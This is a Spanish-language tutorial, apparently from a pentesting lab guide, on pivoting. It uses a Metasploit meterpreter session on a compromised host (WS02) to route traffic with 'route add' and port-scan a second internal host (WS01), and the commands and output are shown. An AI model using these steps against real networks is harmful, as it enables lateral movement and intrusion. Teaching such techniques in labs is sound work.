Pivoting
Esta tecnica de Pivoting
consiste en que no se centra unicamente en un puerto, si no que conseguimos redirigir todo el trafico de datos a la maquina victima que este a nivel local, pudiendo escanear todos los puertos y no solo uno, pudiendo explotarla de cualquier forma que queramos, como si estuviera expuesta a la red, pero estariamos pivotando
a la maquina en si, para que podamos realizar todo esto.
Teniendo una shell
con la maquina WS02
desde metasploit
con meterpreter
, vamos a mandarla al background
con Ctrl+Z
y despues dandole a y
, con esto dejaremos la sesion en segundo plano, para despues poder utilizarla mas adelante.
meterpreter >
Background session 1? [y/N] y
Ahora vamos a utilizar en metasploit
un modulo que se llama route
, esto lo que hace es enrutar todo el trafico de red que nosotros enviemos a la maquina victima que nosotros pongamos, por ejemplo pondremos la de WS01
.
route add 192.168.5.208 255.255.255.0 1
Con el 1
le estamos indicando que utilice la sesion de meterpreter numero 1
, ya que si hacemos sessions
podremos ver las sesiones en mi caso:
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows CORP\empleado2 @ WS02 192.168.5.205:7777 -> 192.168.5.209:63411 (192.168.5.209)
Seria la numero 1
, por eso pongo un 1
.
Info (Comando route
):
[*] Route added
Lo que estamos haciendo es que ahora vamos a enrutar todo el trafico desde la sesion que tenemos de la maquina WS02
a la WS01
, por lo que cuando hagamos un escaneo de puertos o de cualquier otra cosa lo estaremos haciendo a la WS01
por que se lo enviara la maquina WS02
que tenemos comprometida.
Ahora utilizaremos el siguiente modulo:
use auxiliary/scanner/portscan/tcp
Ahora vamos a configurar un poco el modulo para realizar el escaneo de puertos, pero vamos a bajarle un poco los puertos que tiene por defecto y demas cosas.
set PORTS 100-150
set RHOSTS 192.168.5.208
run
En el RHOSTS
ponemos la IP
de la maquina que queremos escanear al cual le hemos echo el route
.
Info:
[+] 192.168.5.208: - 192.168.5.208:135 - TCP OPEN
[+] 192.168.5.208: - 192.168.5.208:139 - TCP OPEN
[*] 192.168.5.208: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
El escaneo a nivel de red
lo ha realizado la maquina WS02
en vez de el kali
ya que se esta enrutando el trafico de red
desde el kali
al WS02
y este al WS01
, por lo que en parte seria un escaneo invisible para nuestra maquina kali
.
Con esto ya digo, podremos utilizar algun exploit
o cualquier otra cosa de explotacion para la maquina WS01
utilizando la maquina de salto WS02
que lo hara en dicho nombre.
Last updated